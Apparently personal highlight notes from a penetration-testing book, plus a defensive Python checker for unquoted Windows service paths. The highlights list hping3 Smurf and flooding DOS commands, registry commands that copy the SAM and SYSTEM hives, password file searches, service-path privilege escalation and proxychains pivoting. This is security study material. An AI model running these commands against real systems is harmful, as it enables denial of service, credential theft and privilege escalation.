# Hacker Methodology Handbook

## Metadata
- Author: [[Thomas Bobeck]]
- Full Title: Hacker Methodology Handbook
- Category: #books
## Highlights
- Xmas Scan: `hping3 -c 1 -V -p $port -s 5050 -M 0 -UPF $url`; Smurf Attack: `hping3 -1 --flood -a $ip BROADCAST_ADDRESS`; DOS Land Attack: `hping3 -V -c 1000000 -d 120 -S -w 64 -p $port -s $port --flood --rand-source $ip`; Options ([Location 311](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=311))
- When using other modules, view information about the module with `msf> info path/of/module` and set any additional variables as needed. ([Location 447](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=447))
- Notes: Below is a breakdown of the above examples and their fields. These fields are Minute, Hour, Day of the month (examples: 1st, 2nd, 10th), Month (examples: 4th, 8th, 9th), Day of the week (examples: 1st, 2nd, ([Location 1278](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1278))
- Method 3: registry hives. Step 1: Save a backup of the sam\system files via CLI: `reg save HKLM\SYSTEM SystemBkup.hiv`; `reg save HKLM\SAM SamBkup.hiv` ([Location 1349](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1349))
- Recursive dir password search: `dir /s *pass* == *cred* == *vnc* == *.config*`; findstr password search: `findstr /spin "password" *.*` ([Location 1370](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1370))
- Not Vulnerable: `BINARY_PATH_NAME : "c:\program files\sub dir\program name"`; Vulnerable: `BINARY_PATH_NAME : c:\program files\sub dir\program name` ([Location 1378](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1378))
- Service paths which are unquoted and contain spaces within the path can be exploited. With the above examples this can be accomplished by placing a file in either c:\ or c:\program files\dir\ with the same name as the file that was scheduled to be run. This new file will be run when the service starts. Typically services will start with the SYSTEM privilege. ([Location 1388](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1388))
- unix-privesc-check detailed ([Location 1414](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1414))
- `proxychains nmap $ip` Notes: Prior to using the proxychains program the below setup steps must be accomplished. Setup steps: Step 1: Create an SSH tunnel to the machine you wish to tunnel through: `ssh -D 127.0.0.1:1080 -p 22 $user@$ip` Step 2: Configure your proxychains.conf file: add `socks4 127.0.0.1 1080` to /etc/proxychains.conf ([Location 1461](https://readwise.io/to_kindle?action=open&asin=B082BD4CTL&location=1461))
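An added defender-side check for the unquoted service path condition described in the BINARY_PATH_NAME highlights above (example code written here, not from the book): it parses constructed `sc qc`-style output, flags any BINARY_PATH_NAME whose executable portion is unquoted and contains a space, and produces the quoted form that removes the ambiguity. The service names and paths in the sample are made up.

```python
import re

# Constructed sample in the shape of `sc qc <service>` output (not real services).
SAMPLE_SC_OUTPUT = r"""
SERVICE_NAME: GoodSvc
        BINARY_PATH_NAME   : "C:\Program Files\Sub Dir\program name.exe" -k netsvcs
SERVICE_NAME: BadSvc
        BINARY_PATH_NAME   : C:\Program Files\Sub Dir\program name.exe -k netsvcs
SERVICE_NAME: NoSpaceSvc
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalService
SERVICE_NAME: ArgSpaceSvc
        BINARY_PATH_NAME   : C:\Tools\agent.exe --config "C:\Program Files\agent\cfg.ini"
"""

# The executable portion ends at the first ".exe"; anything after it is arguments.
_EXE_RE = re.compile(r"(?i)(.*?\.exe)(.*)")


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """True when the executable path is unquoted and contains a space.

    A quoted path is unambiguous, and spaces that appear only in the
    arguments (see ArgSpaceSvc above) do not create the condition.
    """
    path = binary_path.strip()
    if path.startswith('"'):
        return False
    m = _EXE_RE.match(path)
    exe = m.group(1) if m else path.split(" ")[0]
    return " " in exe


def quote_binary_path(binary_path: str) -> str:
    """Return the remediated value: executable wrapped in quotes, arguments kept."""
    path = binary_path.strip()
    if not is_unquoted_with_spaces(path):
        return path
    exe, args = _EXE_RE.match(path).groups()
    return f'"{exe}"{args}'


def find_unquoted_service_paths(sc_output: str) -> dict:
    """Map service name -> True if its BINARY_PATH_NAME is unquoted with spaces."""
    results, name = {}, None
    for line in sc_output.splitlines():
        line = line.strip()
        if line.startswith("SERVICE_NAME:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("BINARY_PATH_NAME") and name:
            results[name] = is_unquoted_with_spaces(line.split(":", 1)[1])
    return results
```

Only services flagged True need the path re-registered in its quoted form; the check is intentionally read-only.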